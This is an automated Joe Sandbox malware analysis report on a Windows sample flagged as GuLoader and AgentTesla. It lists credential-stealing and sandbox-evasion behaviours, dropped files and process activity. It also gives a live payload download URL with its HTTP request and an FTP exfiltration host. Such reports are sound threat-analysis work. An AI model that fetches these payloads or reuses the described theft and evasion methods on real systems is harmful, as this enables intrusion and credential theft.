Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
Analysis ID:635390
MD5:77436b29832ded92b60491ea36018196
SHA1:0314eca204964e3e189b0c0aed7f449e487dc98e
SHA256:b19c8495104c354de9aa1b3403bff2d1211a89fe8892e866d2d8dfd7bb0ba5da
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Contains functionality to detect virtual machines (SLDT)
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe (PID: 8616 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" MD5: 77436B29832DED92B60491EA36018196)
    • CasPol.exe (PID: 8876 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 8884 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 8892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Payload URL": "http://donaldtrumpverse.com/kO4_tiMHM116.bin"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.945527558.0000000002B00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000000.813096057.0000000000F00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: CasPol.exe PID: 8884JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.945527558.0000000002B00000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://donaldtrumpverse.com/kO4_tiMHM116.bin"}
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeVirustotal: Detection: 42%Perma Link
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeReversingLabs: Detection: 21%
            Source: ftp://ftp.solucionest.com.ar/officeAvira URL Cloud: Label: malware
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20409678 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20409D60 CryptUnprotectData,
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PARANTHRACENEJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: msvcr100.i386.pdb source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmp, msvcr100.dll.0.dr
            Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdbSHA2562 source: CDMDataEventHandler.dll.0.dr
            Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdb source: CDMDataEventHandler.dll.0.dr
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040290B FindFirstFileW,

            Networking

            barindex
            Source: Malware configuration extractorURLs: http://donaldtrumpverse.com/kO4_tiMHM116.bin
            Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
            Source: global trafficHTTP traffic detected: GET /kO4_tiMHM116.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: donaldtrumpverse.comCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.solucionest.com.ar/office
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.997300925.000000001C411000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728626213.000000001D5D1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728362756.000000001D5A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42ScOTnxUv4XWwo.net
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: CasPol.exe, 00000004.00000002.5703889334.0000000001267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://donaldtrumpverse.com/kO4_tiMHM116.bin
            Source: CasPol.exe, 00000004.00000002.5703889334.0000000001267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://donaldtrumpverse.com/kO4_tiMHM116.bin2
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jGgoxh.com
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: CasPol.exe, 00000004.00000002.5728626213.000000001D5D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://pie-us1.api.ws-hp.com/clienttelemetry
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://schemaregistry.analysis.ext.hp.com/cdm/gun/com.hp.cdm.platform.software.domain.eventing.reso
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/originatorDetail.schema.json
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/sysInfoBase.schema.json
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://stage-us1.api.ws-hp.com/clienttelemetry
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://us1.api.ws-hp.com/clienttelemetry
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: donaldtrumpverse.com
            Source: global trafficHTTP traffic detected: GET /kO4_tiMHM116.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: donaldtrumpverse.comCache-Control: no-cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040755C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00406D85
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_71081BFF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00EDC1E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00EDDAB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00ED7B58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00EDF446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00ED37C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D2DA160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D2D9890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D2D9548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E2820
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E8A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203EB698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203ED7F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E79B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2040F478
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2040047B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2040E0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20403080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20407290
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20405EA8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2040B8F8
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: libLerc.dll.0.drStatic PE information: Number of sections : 11 > 10
            Source: libenchant-2.dll.0.drStatic PE information: Number of sections : 12 > 10
            Source: gspawn-win64-helper.exe.0.drStatic PE information: Number of sections : 11 > 10
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeVirustotal: Detection: 42%
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\nst89F3.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/12@3/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_004021AA CoCreateInstance,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: CDMDataEventHandler.dll.0.dr, Hp.CDMDataEventHandler/Sender/TelemetrySender.csBase64 encoded string: 'uWg5oksEUHoewK5WcwMNmfkglf2HF7AWQAGHYz0VfFMeg1YF2aEU/2OPoeETAl78'
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8892:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8892:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PARANTHRACENEJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: msvcr100.i386.pdb source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmp, msvcr100.dll.0.dr
            Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdbSHA2562 source: CDMDataEventHandler.dll.0.dr
            Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdb source: CDMDataEventHandler.dll.0.dr

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.945527558.0000000002B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.813096057.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_710830C0 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00ED849F push edi; retn 0000h
            Source: gspawn-win64-helper.exe.0.drStatic PE information: section name: .xdata
            Source: libLerc.dll.0.drStatic PE information: section name: .xdata
            Source: libenchant-2.dll.0.drStatic PE information: section name: .xdata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_71081BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
            Source: CDMDataEventHandler.dll.0.drStatic PE information: 0x9C213F02 [Thu Jan 2 09:55:14 2053 UTC]
            Source: initial sampleStatic PE information: section name: .text entropy: 6.90904492268
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\libenchant-2.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\libLerc.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\msvcr100.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
